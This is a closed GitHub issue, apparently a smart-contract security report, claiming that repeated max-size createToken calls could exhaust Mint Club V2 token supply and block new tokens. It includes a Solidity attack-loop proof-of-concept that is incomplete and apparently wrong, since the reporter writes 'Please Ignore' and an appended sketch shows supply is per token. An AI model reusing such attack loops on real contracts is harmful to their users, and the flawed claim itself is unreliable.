Steemhunt/mint.club-v2-contract

Possible DoS Preventing CreateToken and createMultiToken

Closed this issue · 1 comments

Users can mint the max number of uint128 possible, recurrently.

function createToken(TokenParams calldata tp, BondParams calldata bp) external payable returns (address) {

    BondStep[] memory exampleSteps = new BondStep[](1);
    exampleSteps[0] = BondStep({ rangeTo: 0, price: 0 });

    uint128[] memory price = new uint128[](2); // Adjust the length as needed
    price[0] = 0;
    price[1] = 2;

    uint128[] memory range = new uint128[](2); // Adjust the length as needed
    range[0] = type(uint128).max;
    range[1] = 2;

    BondParams memory bondParams = BondParams({
        royalty: 1000,
        reserveToken: random, // Replace with the actual address
        maxSupply: maxSupply,
        stepRanges: range, // Step ranges
        stepPrices: price // Should have the same length as stepRanges
    });

By leveraging this condition...

if (bp.stepPrices[0] == 0) {

The function above is called multiple times by a malicious contract in a loop, with the aim of maxing out Mcv2Token::totalsupply, which is a uint256, to prevent other users from being able to mint or create a token, in this format:

uint256 totalSupply = testToken.totalSupply();
uint128 newMint = type(uint128).max;
uint256 maxUint = type(uint256).max;

for (uint256 i = 0; i < 10; i++) {
    if ((maxUint - totalSupply) < newMint) {
        newMint = newMint / 2;
    }
    BondStep[] memory exampleSteps = new BondStep[](1);
    exampleSteps[0] = BondStep({ rangeTo: 0, price: 0 });

    uint128[] memory price = new uint128[](2); // Adjust the length as needed
    price[0] = 0;
    price[1] = 2;

    uint128[] memory range = new uint128[](2); // Adjust the length as needed
    range[0] = newMint;
    range[1] = 2;

    BondParams memory bondParams = BondParams({
        royalty: 1000,
        reserveToken: random, // Replace with the actual address
        maxSupply: maxSupply,
        stepRanges: range, // Step ranges
        stepPrices: price // Should have the same length as stepRanges
    });
    MCV2Bond.createToken();

}

The max uint available for McV2Token is almost completely exhausted, and this would prevent other users from creating a new token, as there would be arithmetic overflow and underflow...

This is also applicable here

function createMultiToken(MultiTokenParams calldata tp, BondParams calldata bp) external payable returns (address) {

newToken.mintByBond(_msgSender(), bp.stepRanges[0]);

Please Ignore
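
Added example, not part of the issue and not the project's code: when triaging a report like this, the first thing to establish is whether the supply counter being "maxed out" is shared between callers or belongs to each token instance. The sketch below assumes, as the `newToken.mintByBond(...)` line quoted above suggests, that every `createToken` call deploys a separate token contract; `SketchToken`, `SketchBond` and `SupplyScopeCheck` are hypothetical names.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration with hypothetical names; simplified, not Mint Club code.
contract SketchToken {
    address public immutable bond;   // only the deploying factory may mint
    uint256 public totalSupply;      // storage of THIS token instance only
    mapping(address => uint256) public balanceOf;

    constructor() { bond = msg.sender; }

    function mintByBond(address to, uint256 amount) external {
        require(msg.sender == bond, "not bond");
        totalSupply += amount;       // 0.8.x checked add: reverts on overflow
        balanceOf[to] += amount;
    }
}

contract SketchBond {
    // Assumption: one fresh token contract per call, with the free first
    // step (price 0) minted to the creator.
    function createToken(uint128 firstStepRange) external returns (SketchToken newToken) {
        newToken = new SketchToken();
        newToken.mintByBond(msg.sender, firstStepRange);
    }
}

contract SupplyScopeCheck {
    // Returns true when repeated max-size creations leave a later creation unaffected.
    function run() external returns (bool) {
        SketchBond bondContract = new SketchBond();
        uint128 maxStep = type(uint128).max;

        SketchToken first = bondContract.createToken(maxStep);
        for (uint256 i = 0; i < 10; i++) {
            bondContract.createToken(maxStep);   // same loop shape as the report
        }
        SketchToken later = bondContract.createToken(1000);

        // Each instance counts only its own mint; nothing accumulates across tokens.
        return first.totalSupply() == maxStep && later.totalSupply() == 1000;
    }
}
```

Under that assumption `run()` returns true: a single free mint is bounded by `uint128` while `totalSupply` is a `uint256`, so the checked addition cannot revert on the first mint of a new instance.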